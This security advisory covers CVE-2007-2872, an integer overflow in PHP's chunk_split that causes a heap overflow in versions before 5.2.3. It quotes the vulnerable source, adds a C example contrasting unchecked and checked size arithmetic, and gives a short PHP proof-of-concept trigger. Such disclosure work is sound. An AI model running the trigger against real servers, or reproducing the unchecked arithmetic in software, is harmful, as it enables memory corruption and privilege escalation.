Affected systems:
PHP PHP < 5.2.3
Unaffected systems:
PHP PHP 5.2.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872
PHP is a popular server-side web scripting language.
The chunk_split function in PHP has an integer overflow vulnerability when processing malformed parameters. Local attackers may exploit this vulnerability to escalate their privileges.
Line 1963 of the chunk_split implementation (php_chunk_split in ext/standard/string.c) attempts to allocate enough memory for the function result, but computes the size from the srclen, chunklen and endlen parameters without any overflow check. If the number of chunks and endlen are each larger than 65534 bytes, the product (chunks + 1) * endlen overflows the int, the wrong (too small) memory size is allocated, and the copy loop that follows writes past the buffer, causing a heap overflow.
ext/standard/string.c:
1953 static char *php_chunk_split(char *src, int srclen, char *end,
                                 int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
                             sizeof(char), 0); /* size arithmetic can overflow int */
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }
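The following is an added example (not PHP's own code) that models only the size computation from line 1963: once with 32-bit wraparound, as the unpatched build evaluates it, and once with a checked computation in 64-bit arithmetic that rejects inputs whose result does not fit in an int. It uses the parameters from the advisory's test method (a 65535-byte string, chunk length 1, a 65535-byte end string) and assumes a 32-bit int, as in the affected builds.

```c
/* Added example, not PHP's code: models the allocation-size arithmetic of
 * php_chunk_split() (srclen + (chunks + 1) * endlen + 1) to show why the
 * unchecked version under-allocates and how a checked version refuses it. */
#include <stdint.h>
#include <limits.h>
#include <stdio.h>

/* Unchecked size as the original computes it, truncated to 32 bits.
 * (The real code uses signed int, where overflow is undefined behaviour;
 * truncating the 64-bit value reproduces what a 32-bit build produces.) */
uint32_t chunk_split_size_unchecked(uint32_t srclen, uint32_t chunklen, uint32_t endlen)
{
    uint64_t chunks = srclen / chunklen;
    uint64_t full = (uint64_t)srclen + (chunks + 1) * (uint64_t)endlen + 1;
    return (uint32_t)full;  /* low 32 bits only, as the int arithmetic keeps */
}

/* Checked variant: same expression in 64-bit arithmetic; returns -1 when the
 * result would not fit in an int or when a parameter is invalid, so a caller
 * can refuse the request instead of allocating a buffer that is too small. */
int64_t chunk_split_size_checked(int srclen, int chunklen, int endlen)
{
    if (srclen < 0 || chunklen <= 0 || endlen < 0)
        return -1;
    int64_t chunks = (int64_t)srclen / chunklen;
    int64_t size = (int64_t)srclen + (chunks + 1) * (int64_t)endlen + 1;
    if (size > INT_MAX)
        return -1;  /* would overflow the int passed to the allocator */
    return size;
}

int main(void)
{
    /* Advisory parameters: srclen 65535, chunklen 1, endlen 65535.
     * chunks + 1 = 65536 and 65536 * 65535 + 65535 + 1 = 2^32, so the
     * 32-bit size wraps to 0 bytes while the loop still copies 65536 bytes
     * per iteration; the checked version reports the overflow instead. */
    printf("unchecked size: %u bytes\n", chunk_split_size_unchecked(65535, 1, 65535));
    printf("checked size:   %lld\n", (long long)chunk_split_size_checked(65535, 1, 65535));
    /* Benign case: "abcdefghij" split into 3-byte chunks with a 2-byte end. */
    printf("benign size:    %lld\n", (long long)chunk_split_size_checked(10, 3, 2));
    return 0;
}
```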
<*Source: Gerhard Wagner
Links: http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.net/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedures (methods) may be offensive in nature and are only for security research and teaching purposes. Use at your own risk!
<?php
$a = str_repeat("A", 65535);
$b = 1;
$c = str_repeat("A", 65535);
chunk_split($a, $b, $c);
?>
Suggestion:
--------------------------------------------------------------------------------
Manufacturer patch:
PHP
---
The manufacturer has released an upgrade patch to fix this security issue. Please download it from the manufacturer's homepage:
http://www.php.net/downloads.php#v5
Article from: NSFOCUS Technology